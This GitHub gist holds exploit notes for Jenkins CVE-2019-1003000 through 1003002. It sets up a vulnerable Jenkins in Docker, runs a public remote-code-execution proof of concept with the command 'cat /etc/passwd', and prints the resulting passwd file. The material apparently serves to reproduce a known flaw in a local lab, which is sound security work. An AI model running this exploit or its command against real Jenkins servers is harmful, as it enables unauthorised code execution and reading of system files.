Last active
December 7, 2021 10:17
-
-
Save milo2012/310b9f0d41c55587060a2a2ab6814648 to your computer and use it in GitHub Desktop.
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002 | |
#Install vulnerable docker version of Jenkins | |
$ docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.121.2 | |
- Go to http://127.0.0.1:8080 | |
- Install suggested plugins | |
- Create a user account (admin|admin) | |
- Click "New Item" | |
- Under Item Name, enter 'Helloworld', choose 'Pipeline' and click 'OK' | |
- Under 'Pipeline', untick 'Use Groovy Sandbox' and click 'Save' | |
#Install Scripts to Exploit Vulnerability | |
$ git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git | |
$ cd cve-2019-1003000-jenkins-rce-poc | |
$ pip install -r requirements.txt | |
#Run Exploit and wait for results | |
$ python exploit.py --url http://127.0.0.1:8080 --job Helloworld --username admin --password admin --cmd "cat /etc/passwd" | |
[+] connecting to jenkins... | |
[+] crafting payload... | |
[+] modifying job with payload... | |
[+] putting job build to queue... | |
[+] waiting for job to build... | |
[+] restoring job... | |
[+] fetching output... | |
[+] OUTPUT: | |
Started by user admin | |
Running in Durability level: MAX_SURVIVABILITY | |
[Pipeline] Start of Pipeline | |
[Pipeline] echo | |
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin | |
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin | |
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin | |
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin | |
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin | |
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin | |
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin | |
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin | |
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin | |
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin | |
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin | |
_apt:x:100:65534::/nonexistent:/bin/false | |
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash | |
[Pipeline] End of Pipeline | |
Finished: SUCCESS |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment